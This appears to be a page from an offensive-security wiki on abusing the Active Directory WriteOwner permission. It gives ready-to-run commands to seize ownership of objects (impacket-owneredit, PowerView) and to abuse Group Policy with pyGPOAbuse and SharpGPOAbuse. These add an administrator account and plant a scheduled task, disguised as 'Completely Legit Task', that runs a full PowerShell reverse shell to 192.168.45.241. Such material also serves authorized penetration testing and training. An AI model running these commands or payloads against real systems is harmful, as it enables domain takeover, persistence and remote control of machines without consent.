WriteOwner

Information

Ownership give us the right to modify the object's permissions (DACL).
Once we're owner, we can give ourselves FullControl, we don’t automatically get it.

This permission has the ability to modify the owner of the user, i.e, give the Owns permission, which can then being used to modify object security descriptors, regardless of permissions on the object's DACL.

From Linux:

impacket-owneredit -action write -new-owner <compromised-user> -target <target-account> <domain>/<compromised-user>:<pass>

From Windows (PowerView):

# Create an object with the compromised account's credentials
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)

# Set the ownership of the target object with PowerView
Set-DomainObjectOwner -Credential $Cred -TargetIdentity "<target-account>" -OwnerIdentity "<compromised-user>"

pyGPOAbuse can be used when a controlled account can modify an existing GPO that applies to one or more users & computers. It will create an immediate scheduled task as SYSTEM on the remote computer for computer GPO, or as logged in user for user GPO.

The Policy needs to be updated after the modifications: gpupdate /force.

# Add an administrator user (john:H4x00r123..)
$ uv run pygpoabuse.py domain.local/x7331:Pass123! -gpo-id "31B2F340-016D-11D2-945F-00C04FB984F9"
[+] ScheduledTask TASK_69ed6112 created!

# Revshell
$ uv run pygpoabuse.py domain.local/x7331:Pass123! -gpo-id "31B2F340-016D-11D2-945F-00C04FB984F9" -powershell -command "\$client = New-Object System.Net.Sockets.TCPClient('192.168.45.241',80);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()" -taskname "Completely Legit Task" -description "Dis is legit, pliz no delete" -user
[+] ScheduledTask Completely Legit Task created!

From Windows SharpGPOAbuse can be used to achieve the same result, i.e., add a user into the Administrators group:

./SharpGPOAbuse.exe --AddLocalAdmin --UserAccount x7331 --GPOName "Default Domain Policy"

For subsequent exploitation steps check WriteDACL.

PreviousReadLAPSPassword NextWriteDACL

Last updated 1 month ago

Was this helpful?